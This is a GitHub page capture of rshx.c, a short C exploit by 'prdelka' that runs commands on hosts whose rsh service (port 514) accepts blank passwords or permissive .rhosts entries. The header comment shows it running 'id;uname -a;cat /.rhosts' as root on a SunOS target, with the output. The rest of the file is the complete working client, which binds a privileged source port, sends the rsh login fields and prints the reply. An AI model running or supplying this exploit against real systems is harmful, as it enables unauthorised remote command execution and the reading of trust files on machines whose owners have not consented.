-
Notifications
You must be signed in to change notification settings - Fork 207
/
Copy pathrshx.c
75 lines (66 loc) · 2.03 KB
/
rshx.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
/* rshx.c
* ======
* little exploit for exploiting rsh (514/tcp) with blank passwords
* or bad .rhosts files, you need root to run this code as you must
* open a privileged src port to connect. I came across an old SunOS
* box that was vulnerable to this issue with scanners in nessus &
* metasploit and needed an exploit.
*
* C:\nessus> nasl.exe -t 123.123.123.123 plugins\rsh_users.nasl
* rsh_users.nasl: Success
*
* Example.
*
* # ./rshx 123.123.123.123 root "id;uname -a;cat /.rhosts"
* uid=0(root) gid=0(root)
* SunOS dumdum 5.8 Generic_117350-61 sun4u sparc SUNW,Sun-Fire-V240
* + +
* #
*
* -- prdelka
*/
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
int main (int argc, char *argv[]) {
int ret, fd, length;
fd_set readfds;
struct sockaddr_in sa_dst;
struct sockaddr_in sa_loc;
char* buffer = malloc(65535);
if(argc < 4){
printf("Use with <host> <username> \"command\"\n");
exit(0);
}
if(getuid()!=0){
printf("You should be root to run this\n");
exit(0);
}
fd = socket(AF_INET, SOCK_STREAM, 0);
memset(&sa_loc, 0, sizeof(struct sockaddr_in));
sa_loc.sin_family = AF_INET;
sa_loc.sin_port = htons(1023);
sa_loc.sin_addr.s_addr = inet_addr("0.0.0.0");
ret = bind(fd, (struct sockaddr *)&sa_loc, sizeof(struct sockaddr));
memset(&sa_dst, 0, sizeof(struct sockaddr_in));
sa_dst.sin_family = AF_INET;
sa_dst.sin_port = htons(514);
sa_dst.sin_addr.s_addr = inet_addr(argv[1]);
ret = connect(fd, (struct sockaddr *)&sa_dst, sizeof(struct sockaddr));
send(fd, "\x00",1,0);
send(fd, argv[2], strlen(argv[2]),0);
send(fd, "\x00",1,0);
send(fd, argv[2], strlen(argv[2]),0);
send(fd, "\x00",1,0);
send(fd, argv[3],strlen(argv[3]),0);
send(fd, "\x00",1,0);
ret = recv(fd, buffer, 1, 0);
while(ret) {
ret = recv(fd, buffer, 65534, 0);
printf("%s",buffer);
memset(buffer,0,65535);
}
}